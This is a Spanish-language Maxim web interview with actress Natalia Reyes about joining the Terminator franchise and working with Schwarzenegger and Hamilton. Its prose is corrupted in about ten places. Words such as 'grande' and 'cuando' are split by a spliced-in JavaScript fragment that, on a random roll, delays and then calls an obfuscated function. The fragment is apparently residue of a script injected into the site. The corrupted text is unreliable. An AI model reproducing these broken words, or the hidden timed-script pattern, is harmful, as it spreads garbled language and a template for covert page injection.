ICONS: Entrevista con Natalia Reyes

    ICONS: Entrevista con Natalia Reyes

    Hasta la vista baby.

    Autor: Redacción Maxim 12 noviembre, 2019


    FOTO: GettyImages

     

    Texto por Keith Gordon

     

    La actriz colombiana Natalia Reyes cruzó varias fronteras para jugar en las grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes ligas de Hollywood.

     

    Natalia Reyes ya es reconocida en América Latina gracias a sus increíbles interpretaciones tanto en el cine como en la televisión de su país natal. Pero con la mira puesta en un escenario aún más grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande, logró obtener un papel en una de las franquicias más grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes de todos los tiempos, las cintas de Terminator, y protagonizar la próxima entrega llamada Terminator: destino oculto. Platicó con Maxim sobre su profesión, el trabajar con sus ídolos y sobre cómo equilibra una vida y carrera en Hollywood y en su hogar, uno de los destinos turísticos de moda, Cartagena.

     

    Tuviste mucho éxito entre los críticos y a nivel comercial en Colombia. ¿Qué fue lo que te motivó para buscar expandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andir tu carrera en Hollywood y a una escala de audiencia mucho más global?

    Se podría decir que siempre he soñado en grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande. Como actriz quieres que el mundo vea tu trabajo y mi sueño era hacer películas. Aprendí inglés (por mí misma, si puedes creerlo) porque sabía que era la mejor forma de obtener empleo en producciones grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes. ¡Y ahora soy parte de una franquicia enorme! Todavía no puedo creerlo.

    La saga de Terminator es una de las clásicas del cine. ¿Qué fue lo que te atrajo al proyecto y al papel, y cuál fue tu reacción cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando te dieron el trabajo?

    Al principio pensé que se trataba de un remake, pero luego me enteré de que no lo era y que sería la continuación de la historia de Terminator 2: Judgment Day, con Tim Miller como director y James Cameron otra vez como productor, y que ambos tenían en mente un argumento nuevo con personajes nuevos. Cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando Tim me llamó a decirme que me darían el papel, lloré por horas.

     

     

    ¿Cómo fue trabajar con leyendas como Arnold Schwarzenegger y Linda Hamilton, así como con estrellas como Gabriel Luna y Mackenzie Davis?

    ¡Fue una experiencia increíble! Sentí que era el balance perfecto entre el talento nuevo y las leyendas. Amo a Linda, es la actriz más profesional y comprometida que conozco y un ser humano amoroso. Trabajar con Arnold luego de haberlo visto tantas veces en la pantalla grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande fue surreal y difícil de creer que eso estaba realmente sucediendo. Mackenzie es una gran inspiración para mí, es una actriz maravillosa y nos volvimos muy cercanas al trabajar juntas, me siento realmente feliz de llamarla una buena amiga. Gabriel es una persona muy dulce y estoy muy emocionada de que la gente lo vea como el nuevo Terminator.

     

    ESTRENOS DE CINE MÁS ESPERADOS EN NOVIEMBRE EN MÉXICO

    Temas relacionados con esta nota: , , ,

Hasta la vista baby.